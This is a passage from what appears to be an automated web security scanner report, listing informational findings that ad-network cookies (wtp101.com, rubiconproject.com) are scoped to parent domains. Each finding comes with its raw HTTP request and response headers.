Set-Cookie: opvc=!3919,CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M#,1317600778; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600778,ova!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkMjg5Mj
...[SNIP]...
13.91. http://o-va3.wtp101.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va3.wtp101.com
Path:   /imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg HTTP/1.1
Host: o-va3.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; s=!1762!3105!2445!1731; synclock=t

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:03:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600201,ova3!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3ND
...[SNIP]...
13.92. http://optimized-by.rubiconproject.com/a/7743/12359/21900-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7743/12359/21900-15.js?cb=0.46589411422610283 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; rdk=7845/12566; ses15=13378^2&13209^2&12566^1; csi15=3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; cd=false; lm="2 Oct 2011 23:50:10 GMT"

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:30 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:52:30 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:52:30 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2]]>>&12566^46&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29249; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3348

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...
13.93. http://optimized-by.rubiconproject.com/a/7743/12359/21900-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7743/12359/21900-2.js?cb=0.7007977575995028 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; ses2=13378^2&12566^2; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses15=13378^2&13209^3&12566^2&12359^1; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; rdk=7743/12359; rdk9=0; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:59:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^2&12359^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28822; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3226027.js^1^1317599977^1317599977&3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; expires=Sun, 09-Oct-2011 23:59:37 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1808

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3226027"
...[SNIP]...
13.94. http://optimized-by.rubiconproject.com/a/7743/12359/21900-9.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7743/12359/21900-9.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7743/12359/21900-9.js?cb=0.09602085058577359 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; ses2=13378^2&12566^2; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses15=13378^2&13209^3&12566^2&12359^1; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; rdk=8154/13209; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:59:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7743/12359; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk9=0; expires=Mon, 03-Oct-2011 00:59:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses9=12359^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28822; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3332

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182365"
...[SNIP]...
13.95. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-15.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7845/12566/22557-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk=8154/13209; ses15=13378^2&13209^2; csi15=3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^149&12566^2&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29334; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599465&3223117.js^3^1317599464^1317599464&3226249.js^10^1317599341^1317599463&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:51:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
13.96. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-2.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7845/12566/22557-2.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^3; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3188003.js^3^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1971

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
13.97. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/26848-15.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7845/12566/26848-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
